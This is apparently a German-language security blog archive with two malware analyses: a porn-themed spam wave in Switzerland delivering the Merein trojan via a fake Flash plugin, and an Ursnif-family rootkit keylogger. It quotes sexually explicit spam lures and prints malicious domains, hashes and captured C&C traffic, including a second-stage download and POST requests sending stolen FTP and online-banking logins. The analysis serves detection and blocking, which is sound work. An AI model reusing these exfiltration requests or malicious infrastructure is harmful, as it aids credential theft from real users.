Tag Archive for 'gozi'

Page 4 of 4

Porno-Mails verbreiten Malware in der Schweiz

Seit dem frühen Morgen verbreitet sich der Trojaner Merein (TrendMicro / Sophos) über eine Spam-Welle, welche auf Schweizer Benutzer abzielt. Der E-Mail Text sowie der Betreff ist jeweils auf deutsch verfasst:

Betreff: Blasen mit Madonna

Die erste Seite in der Schweiz, wo es Promis vor der Kamera treiben! Die junge Madonna mit einem prallen Schwengel im Mund oder die skandalösen Clips mit Britney Spears beim Sexspiel vor laufender Kamera! Aber auch Stars aus der Schweiz sind dabei! Und eine ganze Menge davon! Nur bei uns! HEISSE VIDEOS MIT PROMIS!

http://www.schoolswitzerland.com

Betreff sowie die angegebene URL im E-Mail Text variieren.

Domains:

  • schoolswitzerland.com (115.126.2.160)
  • switzerlandgirl.eu (115.126.2.160)
  • switzerlandpussy.eu (115.126.2.160)
  • Betreff:

  • Britney Spears vor der Pornokamera – Skandal!
  • Promiporn
  • Blasen mit Gillian Anderson – Video
  • Junge Portugiesinnen brennen vor Verlangen
  • Blasen mit Madonna
  • Bumsen und Blasen in heissen portugiesischen Stadten
  • Stars gehen am Pornohimmel auf
  • Der Empfänger der E-Mail wird dazu verleitet, auf den im Spam-Mail angegebenen Link zu klicken. Die Webseite nennt sich PornTube und beinhaltet angeblich pornografisches Material. Wird auf ein Bild auf der Webseite geklickt, wird der Besucher dazu aufgefordert, ein Adobe Flash Player HD Plugin zu installieren um den Inhalt anschauen zu können:

    Klickt der Besucher auf CLICK HERE TO DOWNLOAD THE FULL VIDEO ADOBE FLASH PLAYER HD PLUGIN, bekommt er die ausführbare Datei patch_downloader.exe. Die Datei beinhaltet einen Trojaner namens Merein (TrendMicro / Sophos):

    Filename: patch_downloader.exe
    File size: 5436 bytes
    MD5…: 21cefa95951a4c0a5d96be750d9a5f3c
    SHA1..: f5cb1cd9211f79fe819d9d82a0a536c2ac7a014a
    Erkennungsrate: 21/38 (55.26%)

    Wird die Datei patch_downloader.exe ausgeführt, installiert sich der Trojaner auf das System:

    C:\WINDOWS\9129837.exe
    C:\WINDOWS\new_drv.sys

    Als erstes bekommt der Benutzer die Meldung Please, restart your browser!. Im Hintergrund kontaktiert der Trojaner bereits einen C&C Server (hot-sexpt.com 115.126.2.160):

    GET hot-sexpt.com/sutra/in.cgi?2

    Dabei bekommt der installierte Trojaner die Anweisung vom C&C Server weiteren Schadcode herunter zu laden:

    HTTP/1.1 302 Found
    Location: http://hot-sexpt.com/305.exe
    Transfer-Encoding: chunked
    Content-Type: text/html

    document moved http://hot-sexpt.com/305.exe

    Die Datei 305.exe enthält wiederum einen Trojaner:

    Filename: 305.exe
    File size: 53248 bytes
    MD5…: c3c151386dc4b4d3495bffac9344dc80
    SHA1..: 9d72c08500aee50a84c9781dbe09c328812c6ffe
    Erkennungsrate: 3/38 (7.89%)

    Danach meldet sich der Trojaner bei einem weiteren Server (empresalda.com 91.203.92.103):

    POST http://empresalda.com/cgi-bin/pstore.cgi

    Und wieder einmal zeigen die Spuren zur UATelecom (91.203.92.103, siehe frühere Posts).

    Hat sich der Trojaner einmal eingenistet, versucht dieser FTP-Logins mit zu schneiden und die Zugangsdaten zu stehen:

    POST empresalda.com/cgi-bin/forms.cgi HTTP/1.1

    URL: sniffer_ftp_***.ch
    ftp_server=ftp.****.ch&ftp_login=anonymous&ftp_pass=IEUser@&version=0

    Fazit

    Den Empfängern solcher E-Mails wird dringen angeraten, das E-Mail unverzüglich zu löschen und auf keinen Fall das auf den Webseiten angepriesene Adobe Plugin herunter zu laden. Unternehmen sollten es des Weiteren in Betracht ziehen, folgende Domains bzw. IP-Adressen an den zentralen Gateways zu blockieren:

  • 91.203.92.103 (UATelecom)
  • 115.126.2.160 (First Network Communications Hong Kong)
  • schoolswitzerland.com
  • switzerlandgirl.eu
  • switzerlandpussy.eu
  • hot-sexpt.com
  • empresalda.com
  • UPDATE 10:45 Uhr

    Es handelt sich um den selben Trojaner, welche bereits am 25. Oktober 2008 in den USA gesichtet wurde (Siehe Post Rootkit stiehlt FTP-, HTTP- und HTTPS-Logins). Auch diesmal stiehlt der Trojaner nicht nur FTP Zugangsdaten sondern auch diejenigen, welche über HTTP / HTTPS übertragen werden (z.B. beim OnlineBanking).

    UPDATE 20:04 Uhr

    Die Melde- und Analysestelle Informationssicherung (MELANI) hat heute Nachmittag noch eine entsprechende Information herausgegeben:

    Information: E-Mail-Welle mit dem Ziel, Schweizer Computer zu infizieren

    UPDATE 12. Dezember 2008

    Die Spam-Welle scheint nicht abzuklingen. Auch in den letzten Tagen wurde massenweise solcher Spam-Mails verschickt. Hier noch ein exemplar:

    Hallo! Wir sind absolut neu! Und nur für Dich! Du findest uns im Netz unter der Adresse … Bei uns findest Du Videos und heiße Bilder für jeden Geschmack, auch Hardcore, Natursekt, Sodomie und vieles andere mehr! Absolut geil! Lass Deiner Phantasie freien Lauf! Auch Pornoklassiker aus den 70ern und 80ern, jede Menge! Komm rein und leg los! Dem Download sind keine Grenzen gesetzt!

    http://www.sexswitzerland.eu

    Betreff:

  • Ficken ohne Grenzen
  • Videos – nur das Beste!
  • Die erste offizielle und kostenlose Pornoseite in der Schweiz
  • Das beste an Prono im Schweizer Internet
  • Das wahnsinnige Blaskonzert
  • Die beste Sammlung von Pornofilmen
  • Geile Filme fur jeden perversen Geschmack
  • Schuler in Schweizer Schulen besorgen es sich selbst und in der Gruppe
  • Weiter domains, welche derzeit aktiv den Trojaner verbreiten:

  • sexswitzerland.eu (115.126.2.160)
  • bigporno.eu (115.126.2.160)
  • fuckanal.eu (115.126.2.160)
  • bigpornosex.eu (115.126.2.160)
  • Rootkit stiehlt FTP-, HTTP- und HTTPS-Logins

    Trendmicro berichtete kürzlich von einem Trojaner, welcher FTP Logins aufzeichnet und diese zu einem Server sendet. Ich habe mir den Trojaner einmal etwas genauer angeschaut:

    Der Trojaner verbreitet sich über infizierte Links in E-Mails. Klickt man auf einen der Links, gelangt man an eine der folgenden URLs:

    http://ninonem.com/login.htm

    http://repluy.com/login.htm

    http://fgienrsi.com/GetStarted.htm

    http://bberimc.com/GetStarted.htm

    http://binrye.com/GetStarted.htm

    http://unerixs.com/support.html

    Die Domains werden auf einem FastFlux Botnet gehostet (Siehe dnsbl.abuse.ch FastFlux domain check):

    Der Inhalt der Webseiten ist immer Derselbe:

    Die Webseite möchte dem Besucher weiss machen, dass er doch das Security Plus Certificate der in der USA ansässigen Bank Wachovia herunterladen und installieren soll. In der Datei Sslupdate.exe befindet sich nicht etwas ein Sicherheits-Zertifikat, sonder viel mehr ein Trojaner namens Suceret / WebDown:

    Filename: Sslupdate.exe
    File size: 3188 bytes
    MD5…: c4906f64d0ea19dab7a9e7626ee40781
    SHA1..: 7301f0781b8a56f7b0fd59c531fa288d48c16d3e
    Erkennungsrate: 16/36 (44.44%)

    Führt man die Datei aus, nimmt der Trojaner sofort Kontakt mit lodnew.com auf, welche ebenfalls auf einem FastFlux Botnet gehostet wird, und lädt dort weiteren Schadcode nach:

    GET http://loadnew.com/s.exe

    Filename: s.exe
    File size: 32256 bytes
    MD5…: d951f3a8e3485c3c150ba17c0f53db86
    SHA1..: 9d4e1df3237c34c85d14a5a477a5e2dc153edd42
    Erkennungsrate: 5/36 (13.89%)

    Der Trojaner richtet sich nun als Rootkit im System ein und installiert einen Keylogger der
    Win32/Ursnif Familie:

    C:\WINDOWS\9129837.exe
    C:\WINDOWS\new_drv.sys
    C:\WINDOWS\system32\8085.dll

    Des Weiteren installiert der Trojaner einen Backdoor auf einem beliebigen TCP Port:

    Nun kontaktiert er die Domain 1.alisiosanguera.com.cn (91.203.92.103):

    GET 1.alisiosanguera.com.cn/cgi-bin/cmd.cgi?user_id=*HDSERIALNR*&version_id=289&passphrase=fkjvhsdvlksdhvlsd&socks=19726&version=125&crc=00000000

    Bevor wir weiter auf diese URL eingehen, gibt es eine Quiz-Frage von mir: Was denkt ihr, in wessen Subnet liegt die IP-Adresse 91.203.92.103 (1.alisiosanguera.com.cn)? Genau, einmal mehr liegt diese IP-Adresse in den Händen der UATelecom! Bei Spamhaus gibt es auch bereits einen entsprechenden SBL dazu: SBL68462. Zurück zum Thema. In der URL werden folgende Informationen übermittelt:

    user_id = Eindeutige Serien Nummer der HardDisk
    version_id = ??
    passphrase = ??
    socks = TCP Port, auf welchem der Trojaner horcht
    version= Version des installierten Trojaners
    ctc= ??

    Die genannte URL wird dabei in regelmässigen Abständen wieder kontaktiert. Soweit so gut. Richtig interessant wird es aber erst jetzt: Der Trojaner sammelt sämtliche Logins von HTTP, HTTPS und FTP Traffic und sendet die gestohlenen Logins an einen Server. Etwa im Fall einer FTP Verbindung sieht dies folgendermassen aus:

    POST /cgi-bin/forms.cgi HTTP/1.1
    User-Agent: IE
    Host: 1.alisiosanguera.com.cn
    Content-Length: 370
    Cache-Control: no-cache

    Content-Disposition: form-data; name=”upload_file”; filename=”4654654.342″
    Content-Type: *ftpserver*.ch&ftp_login=anonymous&ftp_pass=IEUser@&version=0

    Der Trojaner überträgt die IP Adresse des infizierten Servers inklusive Login sowie Server Adresse an den Server 1.alisiosanguera.com.cn (91.203.92.103). Das Gleiche gilt wie bereits erwähnt auch für HTTP und HTTPS Traffic. Hier das Beispiel eines eBanking Logins über eine scheinbar sichere HTTPS-Verbindung:

    POST /cgi-bin/forms.cgi HTTP/1.1
    User-Agent: IE
    Host: 1.alisiosanguera.com.cn
    Content-Length: 362
    Cache-Control: no-cache

    Content-Disposition: form-data; name=”upload_file”; filename=”4179642204.289″
    Content-Type: application/octet-stream

    URL: https://onlinebank.*.ch/?login
    passw=*passwort*&login=*PIN/TAN*&p_userid=*vertragsnummer*

    Wie man sehr schön sieht, überträgt der Trojaner URL, Vertragsnummer, Passwort sowie PIN/TAN der Onlinebank – die aber im Falle eines Einmal-PIN/TANs in diesem Moment für den Angreifer keinen Nutzen mehr hat. Ob Challenge-Response Verfahren moderner Telebanking-Systeme ebenfalls angegriffen werden, konnte ich mangels eines gültigen Kontos leider nicht testen.

    Im Gegensatz zum Banken Trojaner WSNPoem und Torpig “schiesst” dieser Trojaner auf alles was ihm in die Quere kommt. Das heisst, er zielt nicht im Speziellen auf Banken oder andere spezifische Ziele ab sonder greift alles an, was nach einem Login aussieht. Der Einsatz von SSL schützt dabei nicht, da die Passwörter oberhalb des SSL-Layers abgegriffen wird.

    Fazit

    Die Spam-Mails, welche den Trojaner respektive die infizierten URLs beinhalten, werden derzeit zwar ausschliesslich in den USA versendet, jedoch ist die Malware (zumindest für mich) äusserst interessant: Am vergangenen Wochenende bin ich auf einen Command&Control Server gestossen, welcher einen anderen Trojaner mit FTP-Credentials von Webservern versorgt, damit dieser danach versucht, auf diesen Webservern DriveBy-Infektionen zu platzieren – also eine Infrastruktur zum verteilten Infizieren von Webservern. Es war mir möglich, dieses C&C anzuzapfen und mittlerweile eine (noch immer wachsende) Liste mit über 50′000 FTP Logins zu sammeln. Es ist anzunehmen, dass dieser Server eben über einen Keylogger wie dem Vorliegenden mit Passwörtern gefüttert wird. Möglicherweise besteht sogar ein direkter Zusammenhang zwischen diesen beiden Komponenten.

    Es bleibt noch zu erwähnen, dass das Botnetz, welches die Domains hostet, früher bereites WSNPoem sowie verschiedene Money-Mule und phishing Domains gehostet hat.

    Zu guter Letzt wie immer die Liste mit URLs und IPs, welche blockiert werden sollten:

  • ninonem.com
  • repluy.com
  • fgienrsi.com
  • bberimc.com
  • binrye.com
  • unerixs.com
  • securebbb.com
  • alisiosanguera.com.cn
  • loadnew.com
  • 91.203.92.103



  • economics-recluse
    Scene
    Urgent!